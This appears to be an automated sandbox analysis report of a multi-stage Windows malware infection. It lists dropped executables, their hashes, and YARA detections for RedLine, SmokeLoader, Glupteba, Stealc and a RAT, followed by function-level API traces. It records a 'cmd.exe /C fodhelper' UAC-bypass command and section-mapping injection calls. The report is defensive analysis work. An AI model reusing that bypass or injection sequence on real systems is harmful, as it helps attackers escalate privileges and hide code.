Start time:	10:44:28
Start date:	24/12/2023
Path:	C:\Users\user\AppData\Local\Temp\23F8.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\23F8.exe
Imagebase:	0xc50000
File size:	2'774'960 bytes
MD5 hash:	C34C5873CC37033CF7A75A400BB50B1A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 39%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:44:29
Start date:	24/12/2023
Path:	C:\Users\user\AppData\Local\Temp\28CC.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\28CC.exe
Imagebase:	0xd40000
File size:	834'048 bytes
MD5 hash:	F94B2515B62B2EE2A9A07F2747C283EC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000000.2389009297.0000000000D42000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000000.2389009297.0000000000D42000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\28CC.exe, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\28CC.exe, Author: Joe Security Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\28CC.exe, Author: ditekSHen
Antivirus matches:	Detection: 87%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	10:44:29
Start date:	24/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5340 -ip 5340
Imagebase:	0xd40000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:44:30
Start date:	24/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 724
Imagebase:	0xd40000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:44:31
Start date:	24/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5340 -ip 5340
Imagebase:	0xd40000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:44:31
Start date:	24/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 780
Imagebase:	0xd40000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	10:44:33
Start date:	24/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5340 -ip 5340
Imagebase:	0xd40000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	10:44:33
Start date:	24/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 864
Imagebase:	0xd40000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	10:44:34
Start date:	24/12/2023
Path:	C:\Users\user\AppData\Local\Temp\3ABE.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\3ABE.exe
Imagebase:	0xc50000
File size:	7'079'936 bytes
MD5 hash:	3954CC01C26D1962284F3B95602F2367
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\3ABE.exe, Author: ditekSHen
Antivirus matches:	Detection: 73%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	10:44:35
Start date:	24/12/2023
Path:	C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
Imagebase:	0x400000
File size:	4'425'080 bytes
MD5 hash:	1894F7AA0F57BEC640F13E2EC87840E1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000016.00000003.2459792248.0000000003C82000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000016.00000002.2603121419.0000000003393000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000016.00000002.2594659373.0000000002B4C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000016.00000002.2581006895.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000016.00000002.2603121419.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 46%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	10:44:35
Start date:	24/12/2023
Path:	C:\Users\user\AppData\Local\Temp\InstallSetup9.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\InstallSetup9.exe"
Imagebase:	0x400000
File size:	2'349'777 bytes
MD5 hash:	B244F23C876D3F9A81F2C2B395408E70
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 58%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	10:44:35
Start date:	24/12/2023
Path:	C:\ProgramData\Drivers\csrss.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Drivers\csrss.exe"
Imagebase:	0x400000
File size:	2'017'792 bytes
MD5 hash:	EE1049D8F8248D11080582FE27F96843
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000019.00000002.2506318498.0000000005600000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 91%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	10:44:36
Start date:	24/12/2023
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	10:44:36
Start date:	24/12/2023
Path:	C:\ProgramData\Drivers\csrss.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Drivers\csrss.exe"
Imagebase:	0x400000
File size:	2'017'792 bytes
MD5 hash:	EE1049D8F8248D11080582FE27F96843
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	10:44:37
Start date:	24/12/2023
Path:	C:\Users\user\AppData\Local\Temp\InstallSetup9.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\InstallSetup9.exe"
Imagebase:	0x400000
File size:	2'349'777 bytes
MD5 hash:	B244F23C876D3F9A81F2C2B395408E70
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	10:44:37
Start date:	24/12/2023
Path:	C:\Users\user\AppData\Local\Temp\toolspub2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\toolspub2.exe"
Imagebase:	0x400000
File size:	294'400 bytes
MD5 hash:	85E39A9EF8C8F1BEEF408EFC12256FF4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001D.00000002.2507900128.00000000007DC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 51%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	10:44:37
Start date:	24/12/2023
Path:	C:\Users\user\AppData\Local\Temp\BroomSetup.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\BroomSetup.exe
Imagebase:	0x400000
File size:	5'515'264 bytes
MD5 hash:	00E93456AA5BCF9F60F84B0C0760A212
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001E.00000000.2501968948.0000000000401000.00000020.00000001.01000000.00000013.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, Author: Joe Security
Antivirus matches:	Detection: 30%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	10:44:40
Start date:	24/12/2023
Path:	C:\Users\user\AppData\Local\Temp\toolspub2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\toolspub2.exe"
Imagebase:	0x400000
File size:	294'400 bytes
MD5 hash:	85E39A9EF8C8F1BEEF408EFC12256FF4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000020.00000002.2567378740.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000020.00000002.2567378740.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000020.00000002.2566695195.0000000000510000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000020.00000002.2566695195.0000000000510000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	10:44:41
Start date:	24/12/2023
Path:	C:\Users\user\AppData\Local\Temp\5AAB.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\5AAB.exe
Imagebase:	0x400000
File size:	291'840 bytes
MD5 hash:	F2FD38A6DDDB5B6C67C9F6622AFBD47B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000021.00000002.2576715826.00000000005ED000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000021.00000002.2576846964.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000021.00000003.2513498191.0000000002080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	10:44:41
Start date:	24/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5836 -ip 5836
Imagebase:	0xd40000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	10:44:42
Start date:	24/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 360
Imagebase:	0xd40000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	10:44:43
Start date:	24/12/2023
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	10:44:44
Start date:	24/12/2023
Path:	C:\Users\user\AppData\Local\Temp\6ED0.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\6ED0.exe
Imagebase:	0x400000
File size:	6'817'190 bytes
MD5 hash:	68514F27EE18239DBB1731E852DFF0C1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	10:44:45
Start date:	24/12/2023
Path:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
Imagebase:	0x400000
File size:	314'368 bytes
MD5 hash:	14ECE4108FC25FE4D185C101714A25B3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000026.00000002.3186242859.000000000080C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000026.00000002.3186779959.00000000022C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000026.00000003.2555550237.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000026.00000002.3185354932.0000000000400000.00000040.00000001.01000000.00000017.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000026.00000002.3185992517.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000026.00000002.3185992517.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	10:44:45
Start date:	24/12/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Sysnative\cmd.exe /C fodhelper
Imagebase:	0x7ff7350e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	10:44:45
Start date:	24/12/2023
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x700000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	18.7%
Signature Coverage:	34.5%
Total number of Nodes:	139
Total number of Limit Nodes:	7

Executed Functions

Function 00401590 Relevance: 10.7, APIs: 7, Instructions: 203
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000000.00000002.2041818835.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_16GAuqLUFK.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 569c601533bfa5fc76acd0aceccd82dced2ec0ba9158162e35254d0d933d7b6e
Instruction ID: d6964195f2ae178c179c3b7a32e304a619fe45f2cb2dcf097c8130f3d204b23e
Opcode Fuzzy Hash: 569c601533bfa5fc76acd0aceccd82dced2ec0ba9158162e35254d0d933d7b6e
Instruction Fuzzy Hash: 64616FB0904205FFEB208F91CC58FAF7BB8EF81710F10416AFA12BA1E5D6749941DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040159B Relevance: 10.7, APIs: 7, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000000.00000002.2041818835.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_16GAuqLUFK.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: bae20a228bd41bc7813985564ad54ad8a6399e0ad18c72377fec9941621639a0
Instruction ID: ff81ed2e81490e93a7bfe721f9c6a4d9304ec08e35c355afa89281eda0ffd623
Opcode Fuzzy Hash: bae20a228bd41bc7813985564ad54ad8a6399e0ad18c72377fec9941621639a0
Instruction Fuzzy Hash: 3E5109B5900249BFEB208F91CC49FAB7BB8FF85710F144169FA11BA2E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004015B0 Relevance: 10.7, APIs: 7, Instructions: 169
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000000.00000002.2041818835.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_16GAuqLUFK.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 6c4736dca5741fb18473fdef31891e556f9b158cac04651ef2a3a7cb79a50736
Instruction ID: af686ae4933c2f6004de28669cc23aaadd0110c3f88d1b974755b8c34b4799b2
Opcode Fuzzy Hash: 6c4736dca5741fb18473fdef31891e556f9b158cac04651ef2a3a7cb79a50736
Instruction Fuzzy Hash: 0E51F9B5900249BFEB208F91CC48FAF7BB8FF85B10F104169FA11BA2E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004015BC Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000000.00000002.2041818835.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_16GAuqLUFK.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 72661907227a9452eb25ab953c02bdcf5a827517e06e297a0d085dc110f4c5bf
Instruction ID: 765dedf92b6036aea99e2596c7c6646b0bcbba97602321f23575c560d9e65fb8
Opcode Fuzzy Hash: 72661907227a9452eb25ab953c02bdcf5a827517e06e297a0d085dc110f4c5bf
Instruction Fuzzy Hash: 1451E8B5900249BFEF208F91CC48FDF7BB8FF85B10F104169FA11AA2A5D6749945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004015CB Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000000.00000002.2041818835.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_16GAuqLUFK.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 004f83838c091370c792dd4fcb680897e20f1790ca1ffba750393c7614aa26f8
Instruction ID: 60f1a669064b898f2f8cfe764b4cdaf5e199705ebcb5ef48edc51869d28594cd
Opcode Fuzzy Hash: 004f83838c091370c792dd4fcb680897e20f1790ca1ffba750393c7614aa26f8
Instruction Fuzzy Hash: 2C51FAB1900249BFEF208F91CC48F9FBBB8FF85B10F104169FA11AA2A5D7749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0050E1C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0050E1EE
Module32First.KERNEL32(00000000,00000224), ref: 0050E20E

Memory Dump Source

Source File: 00000000.00000002.2042284755.000000000050D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0050D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50d000_16GAuqLUFK.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 22ff6fe9166409f6ade540dc751658d52de7e2da5cd3772f0ab6a84067137ae3
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 18F0C2352003116BD7203AF4988EA6E7AECBF99325F200928F643914C1CA70E9458660

Uniqueness

Uniqueness Score: -1.00%

Function 004029BA Relevance: 1.6, APIs: 1, Instructions: 60
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000000.00000002.2041818835.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_16GAuqLUFK.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8b4368bb53e1649655da800b8e3771367f61da053ffbe47dde7c34dc5595736a
Instruction ID: ddfd821467dba8d9e3be05996510f596060048204c77d2b9bdf6330f9e046059
Opcode Fuzzy Hash: 8b4368bb53e1649655da800b8e3771367f61da053ffbe47dde7c34dc5595736a
Instruction Fuzzy Hash: 5C11E571708104E7D6209A449B4EF6B3724AB50B00F308077E5077A1C0D9FD9A07BBAF

Uniqueness

Uniqueness Score: -1.00%

Function 00426F30 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 236
librarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00436E88,0BB7EA7B,4BBE82DD,2FC43CC7,52860AB1,6AD71B2C,43FE4454,34026A25), ref: 004277B9
VirtualProtect.KERNELBASE(0043738C,00438678,00000040,?), ref: 004277D4

Strings

v;^:, xrefs: 00427388
o:?, xrefs: 004275CD
U99x, xrefs: 00427092
)?u, xrefs: 00427645
dFfX, xrefs: 00427255
O8##, xrefs: 004271C4
R'._, xrefs: 00427330
6, xrefs: 004270A8
X2R, xrefs: 0042715F
F(+, xrefs: 00426FEE
:/X, xrefs: 0042726B

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID: LibraryLoadProtectVirtual
String ID: )?u$:/X$F(+$O8##$R'._$U99x$X2R$dFfX$v;^:$o:?$6
API String ID: 3279857687-975362989
Opcode ID: 4f582130c55c0daaa28ae105245a35626e2abde3df613d855247164ff8645d53
Instruction ID: 399b24f5a2b98565675b812eccd8896e7e81258963e30ea779c0b9d5388b49be
Opcode Fuzzy Hash: 4f582130c55c0daaa28ae105245a35626e2abde3df613d855247164ff8645d53
Instruction Fuzzy Hash: 4B02A7B400E385CFD2B09F46D68A78EBBE0BB91704F618A0CD5DD1A221CBB54589CF97

Uniqueness

Uniqueness Score: -1.00%

Function 004D003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

